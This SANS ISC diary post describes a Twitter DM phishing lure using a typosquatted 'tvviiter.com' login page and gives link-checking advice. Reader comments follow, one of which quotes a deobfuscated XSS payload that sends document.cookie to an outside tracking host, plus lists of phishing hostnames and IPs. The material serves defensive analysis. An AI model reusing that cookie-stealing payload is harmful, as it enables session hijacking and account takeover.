Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: It's Phishing Season! In fact, it's ALWAYS Phishing Season! SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
It's Phishing Season! In fact, it's ALWAYS Phishing Season!

It's always great to hear from our readers, we just got this note in from Tom on a phish that he recently encountered:

One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:

hilarious pic! bit.ly/KIbUqq

That bit.ly URL redirects to:
http://tvviiter.com/log-in/q2/?session_timeout=iajb864?emgzw

That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password.  As of this writing (May 30, 2012 12:18pm EDT), the site is still available.

The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China.  The whois record also have an HTML "script" tag in it, which may be an attempt to XSS users using web-based WHOIS services (though I did not try loading the JS file to find out).

While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before.  I thought that you guys might find it interesting!

I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.

 

This was just too good an example to pass up writing about.  Things to watch out for:

  • Any link you're asked to click on, in any context is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.
  • If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partiitioned and "safe"
  • Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in twitter is a nice touch, easy to miss
  • Finally, before clicking the link, DON'T CLICK THE LINK.  Cut and paste it into your browser rather than clicking it directly.

If you've got any other pointers, or if I've missed anything, please use our comment to .. well... comment !

 

===============
Rob VandenBrink
Metafore

Rob VandenBrink

521 Posts
ISC Handler
bit.ly and other URL shortener services have a way to see the hidden address without visiting. Bit.ly used to use an "=" symbol at the end of the URL, but now they have an API for that.
AndrewB

24 Posts
It looks like the Javascript XSS in the WHOIS record for tvviiter.com is only mildly evil, and not related to the phishers. The record for every site registered by XIN NET seems to include it, and (at least when I request it with wget and TOR) the script just writes out an ad banner image and link for XIN NET's own domain registration service. XIN NET has a reputation for being scummy, but that's still pretty impressive behavior for even a semi-legitimate company.
ElliotK

1 Posts
To see what's behind a link created by a URL shortener service, you can use any of the following sites:
http://www.getlinkinfo.com/
http://longurl.org/
bartblaze

5 Posts
_If_ you decide to open a suspicious link, I suggest you first logoff from all webbased sessions you have open, in particular your webmail if that's how you received the link.

For example, Yahoo users were/are targeted as follows: they receive a mail from someone they know asking them to click on a link such as hxxp://www.news15jo.net/biz/ (other hostnames include www.news15de.net and www.inews15ny.net, many more will probably exist, each of them currently resolving to 190.123.43.180, 77.79.14.249, 77.79.13.19, 193.107.19.215, 190.123.43.85, 193.107.19.185, 190.123.43.85, 50.7.246.171). My source (in Dutch): http://www.security.nl/artikel/41676/1/Gevaarlijke_site_als_url_in_de_mail.html

hxxp://www.news15jo.net/biz/ looks like a news site, however "get rich quick" is all over the place. For anyone who trusts these guys:
"How A single Mom from [location obtained from http://j.maxmind.com/app/geoip.js] unlocked a gold mine and is turning huge profits from home."
Just Google for (including the double quotes): "How A single Mom from" "unlocked a gold mine and is turning huge profits from home."

In between de calls to various websites the following is interesting (simplified by me):

GET /forumCreation/createNewForum?p=aaaa [followed by obfuscated stuff including, deobfuscated: onmousemove="document.location.href='http://trackuk.net/ru/tracking.php?ex='.concat(escape(document.cookie)) ]
Host: kr.kpost.yahoo.com
Referer: http://www.news15jo.net/biz/toto.php

I've not fully investigated this (didn't see any drive-by malware, but some netizens report otherwise). However I assume that if you're still logged on to Yahoo and you click the link, a thread on the KPost (Korea) forum is created by _you_ followed by some magic that causes you to spam everyone in your Yahoo addresslist.

PS1 NoScript in Firefox cries XSS.

PS2 Google for "/forumCreation/createNewForum?p=aaaa" (including the double qoutes) results in a lot of recent urlquery.net hits.

PS3 Apparently this has been going on for some time now, see http://www.workathometruth.com/herman-cain-email-spam-used-by-scammers-to-push-home-business-scams/
Erik van Straten

122 Posts

Sign Up for Free or Log In to start participating in the conversation!